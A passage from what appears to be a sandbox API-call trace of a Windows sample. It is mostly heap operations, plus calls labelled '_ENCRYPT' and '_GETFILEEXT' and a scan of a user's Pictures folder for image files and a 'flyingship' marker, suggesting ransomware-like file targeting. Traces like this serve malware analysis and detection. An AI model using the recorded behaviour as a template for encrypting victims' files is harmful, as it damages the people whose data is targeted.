Flags=0x0, Size=0x20) returned 0x8dea10 [0189.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0189.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0189.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0189.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.562] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0189.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0189.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0189.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0189.563] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0189.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0189.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0189.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0189.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0189.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0189.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0189.564] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0189.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0189.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.565] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0189.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd810, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0189.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.565] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0189.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0189.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0189.565] CloseHandle (hObject=0x160) returned 1 [0189.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0189.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0189.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0189.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0189.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.566] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0189.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.567] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0189.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0189.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0189.567] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0189.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0189.567] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0189.567] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0189.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0189.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.567] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0189.567] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0189.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0189.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0189.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0189.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0189.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.567] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0189.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.568] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.568] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.568] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f47ce0, ftCreationTime.dwHighDateTime=0x1d5d9c2, ftLastAccessTime.dwLowDateTime=0xe8598c0, ftLastAccessTime.dwHighDateTime=0x1d5e321, ftLastWriteTime.dwLowDateTime=0xe8598c0, ftLastWriteTime.dwHighDateTime=0x1d5e321, nFileSizeHigh=0x0, nFileSizeLow=0xa5d9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="P8P2Fux.gif", cAlternateFileName="")) returned 0x90add8 [0189.568] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.568] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.568] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f47ce0, ftCreationTime.dwHighDateTime=0x1d5d9c2, ftLastAccessTime.dwLowDateTime=0xe8598c0, ftLastAccessTime.dwHighDateTime=0x1d5e321, ftLastWriteTime.dwLowDateTime=0xe8598c0, ftLastWriteTime.dwHighDateTime=0x1d5e321, nFileSizeHigh=0x0, nFileSizeLow=0xa5d9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="P8P2Fux.gif", cAlternateFileName="")) returned 0x90add8 [0189.568] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.568] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif\"", 